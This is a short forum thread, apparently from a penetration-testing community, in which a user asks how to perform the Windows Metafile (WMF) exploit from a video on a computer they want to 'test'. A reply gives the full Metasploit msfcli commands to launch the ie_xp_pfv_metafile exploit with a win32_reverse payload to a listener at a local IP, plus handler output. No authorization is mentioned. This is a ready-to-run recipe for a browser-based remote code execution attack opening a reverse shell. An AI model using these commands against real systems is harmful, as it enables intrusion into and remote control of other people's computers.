Results 1 to 3 of 3

Thread: WMF-exploit how is this done- i can't make out the writing

  1. #1
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    5

    Default WMF-exploit how is this done- i can't make out the writing

    youtube.com/watch?v=nQmgWSeXZik this seems perfect for the computer i want to test but i can't make out his text and his words don't match his actual text. Anyone point me the direction of what to do after 2.10 in the video

  2. #2
    Member
    Join Date
    Jan 2010
    Posts
    140

    Default

    Quote Originally Posted by viso0 View Post
    youtube.com/watch?v=nQmgWSeXZik this seems perfect for the computer i want to test but i can't make out his text and his words don't match his actual text. Anyone point me the direction of what to do after 2.10 in the video
    This should suffice.
    Code:
    # cd /pentest/exploits/framework2
    # ./msfcli |grep metafile
      ie_xp_pfv_metafile             Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
    # ./msfcli ie_xp_pfv_metafile HTTPPORT=80 PAYLOAD=win32_reverse LHOST=192.168.1.6 E
     [*] Starting Reverse Handler.
     [*] Waiting for connections to http://192.168.1.6:80/

  3. #3
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    5

    Default

    this was such a help thanks a bunch been looking for this for a while got turned website- PLEASE close Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •